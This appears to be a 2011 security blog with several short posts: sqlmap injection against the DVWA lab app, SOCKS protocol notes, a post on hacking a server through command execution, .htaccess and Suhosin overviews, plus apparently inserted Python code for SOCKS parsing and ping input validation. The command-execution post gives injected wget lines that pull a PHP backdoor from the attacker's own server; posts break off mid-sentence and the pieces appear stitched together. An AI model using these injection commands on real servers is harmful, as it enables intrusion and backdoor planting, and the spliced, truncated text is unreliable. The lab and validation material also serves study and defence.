Monday, July 25, 2011

Installing Backdoor in the Database through SQL Injection


Now I will explain how to install a backdoor in the database through SQL Injection. For this practice, I use DVWA as the web application. DVWA is a readily available web application for SQL Injection and SQL Injection (Blind).
First, I choose SQL Injection as my target. In the user ID form, I just type admin and then click Submit, but nothing happens. Then I copy the address (from the site after I submit admin as the user ID). I use sqlmap and try this command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit"

But this fails to get the database. Then I try Tamper Data from the browser. From Tamper Data, I get the cookie and copy it. With sqlmap, I scan again with this command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=admin&Submit=Submit" --cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4"

From the result of the command above, I can see that the parameter id is vulnerable and might be injectable.

Wednesday, July 20, 2011

SOCKS, SOCKS v4, SOCKS v5 and HTTP

SOCKS is an Internet protocol that routes network packets between a client and server through a proxy server. SOCKS5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server will proxy TCP connections to an arbitrary IP address as well as providing a means for UDP packets to be forwarded.
One use of SOCKS is to allow connections to be made through a firewall.

SOCKS4 is the first widely adopted version of the protocol. It suffers from a couple of problems which have been remedied in SOCKS4A and SOCKS5, namely:
· It requires clients to know the IP address (e.g. 123.123.123.123) of the servers they want to connect to. This means, in most cases, that they must be able to resolve domain names.
· There is no authentication. A client only requires a user-name to be able to access SOCKS4 services.
SOCKS4A is a simple extension to SOCKS4 which solves the former problem, but not the latter.
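
The two SOCKS4 limitations above are visible in the request bytes themselves. The following is an added example, not part of the original post: it builds and parses SOCKS4 and SOCKS4A CONNECT requests, with function names and sample values (user "alice", example.com) chosen here for illustration.

```python
import ipaddress
import struct

def build_socks4_connect(host, port, userid=b""):
    """Build a SOCKS4 CONNECT request, switching to SOCKS4A for hostnames."""
    try:
        dst_ip = ipaddress.IPv4Address(host).packed
        hostname = b""
    except ipaddress.AddressValueError:
        # SOCKS4A: the client does not resolve the name; it sends the
        # invalid address 0.0.0.x (x != 0) and appends the hostname.
        dst_ip = b"\x00\x00\x00\x01"
        hostname = host.encode("ascii") + b"\x00"
    # Layout: VN=4, CD=1 (CONNECT), DSTPORT, DSTIP, USERID, NUL [, hostname, NUL]
    return struct.pack(">BBH", 4, 1, port) + dst_ip + userid + b"\x00" + hostname

def parse_socks4_request(data):
    """Proxy-side view of a request: which variant, which target, which user."""
    if len(data) < 9 or data[0] != 4:
        raise ValueError("not a SOCKS4 request")
    _, command, port = struct.unpack(">BBH", data[:4])
    dst_ip = data[4:8]
    uid_end = data.find(b"\x00", 8)
    if uid_end == -1:
        raise ValueError("USERID is not NUL-terminated")
    info = {
        "variant": "SOCKS4",
        "command": command,
        "port": port,
        "host": str(ipaddress.IPv4Address(dst_ip)),
        # The USERID is only a claimed name: the request has no password
        # or challenge field, so the proxy cannot verify it.
        "userid": data[8:uid_end].decode("latin-1"),
    }
    if dst_ip[:3] == b"\x00\x00\x00" and dst_ip[3] != 0:
        host_end = data.find(b"\x00", uid_end + 1)
        if host_end == -1:
            raise ValueError("SOCKS4A hostname is not NUL-terminated")
        info["variant"] = "SOCKS4A"
        info["host"] = data[uid_end + 1:host_end].decode("ascii")
    return info

if __name__ == "__main__":
    # Constructed sample requests
    for target in ("123.123.123.123", "example.com"):
        request = build_socks4_connect(target, 80, b"alice")
        print(request.hex(), parse_socks4_request(request))
```
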

SOCKS5 is the most recent version of the SOCKS protocol.  It solves both the problems of

Hacking System Through Web Application

Some people who create websites usually do not pay attention to the security of their site. This is dangerous and harmful. Through a web application, we can attack the server.
In this post, I will describe my experience of hacking a server through a web application.
As a first step, we must search for a vulnerability in the web application. On this site, I found command execution.
Then I try to ping the IP address (in this case, I already have the IP address of the server).
After I enter the IP address, the result appears below. This means I can do something with this command execution.
Next, I try to upload an image through command execution, but there is no response and nothing happens. Then I try to upload a backdoor, and the response is the same as when I uploaded the image.
To upload a file through command execution, we can use this command:
ip_target | wget our_ip_address/file.jpg -O 123.jpg (for this command, we must start our Apache server and the file must be saved to /var/www/)
or we can use this command:
;wget (layout file)/file.php -O 123.php
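
The server-side fix for the command execution described above, as an added example that is not part of the original post or of DVWA: it assumes a hypothetical handler that receives the form value as a string, accepts only a bare IP address, and runs ping without a shell. The sample inputs are constructed from the command shapes shown in the post.

```python
import ipaddress
import subprocess

def ping_argv(user_input, count=3):
    """Return the argv list for ping, or raise ValueError for anything
    that is not exactly one IPv4/IPv6 address."""
    candidate = user_input.strip()
    try:
        addr = ipaddress.ip_address(candidate)
    except ValueError:
        raise ValueError("target must be a single IP address") from None
    # str(addr) is the canonical form, so it cannot contain shell
    # metacharacters, spaces, or a leading '-' that ping would read as an option.
    return ["ping", "-c", str(count), str(addr)]

def run_ping(user_input):
    """Run ping with an argv list; no shell ever parses the form value."""
    return subprocess.run(ping_argv(user_input), capture_output=True,
                          text=True, timeout=15, check=False)

# Constructed inputs: one legitimate value, the two separator patterns
# from the post ('|' and ';'), and an option-injection attempt.
CONSTRUCTED_INPUTS = [
    "192.168.56.101",
    "192.168.56.101 | wget our_ip_address/file.jpg -O 123.jpg",
    ";wget our_ip_address/file.php -O 123.php",
    "-c 1000 192.168.56.101",
]

def classify(inputs):
    """Map each input to 'accepted' or 'rejected' by the validator."""
    verdicts = {}
    for value in inputs:
        try:
            ping_argv(value)
            verdicts[value] = "accepted"
        except ValueError:
            verdicts[value] = "rejected"
    return verdicts

if __name__ == "__main__":
    for value, verdict in classify(CONSTRUCTED_INPUTS).items():
        print(f"{verdict:8} {value!r}")
```
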

Thursday, July 14, 2011

.htaccess

Hypertext Access, commonly shortened to htaccess, is a configuration file which controls the directory it is placed in and all the subdirectories underneath it. It's an incredibly useful feature which allows webmasters to control many aspects of how their website works. You can redirect pages, change the extensions of pages, password protect directories and much, much more.
In this htaccess guide I will show you some of the basic tricks and tips which will help you with your website.

So what is htaccess?
The htaccess file is a configuration file which is used on Apache-based web servers to control many features of the server. The file itself is just a small basic text file and can be edited via your host's file manager, or alternatively you can download the file, edit it and re-upload it.
If you have installed a script before, then chances are you have had to edit the .htaccess file at one point or another. The .htaccess file gives you a lot of control and lets you easily redirect pages, password protect directories and much more. Before I go through some tutorials which show you how to use htaccess, I think it is necessary to show you how to edit the file.

Friday, July 8, 2011

Suhosin

Suhosin is part of the Hardened PHP project, the project to make PHP more secure. The Suhosin PHP extension checks various things such as suspicious input (to detect SQL injection, for example), prevents the occurrence of a bug in the Zend engine, makes the default PHP settings more secure (e.g. turning off the remote include features by default), etc. More details about the features and usage can be read on the Suhosin homepage.

For the sake of better security, the PHP installation on the hosting server has been equipped with Suhosin since January 2007.

PHP equipped with Suhosin is not a "silver bullet" or a perfect, comprehensive solution. The most important factor in maintaining security remains in your hands as a programmer / developer: keep programming securely and keep the PHP applications / libraries you install up to date.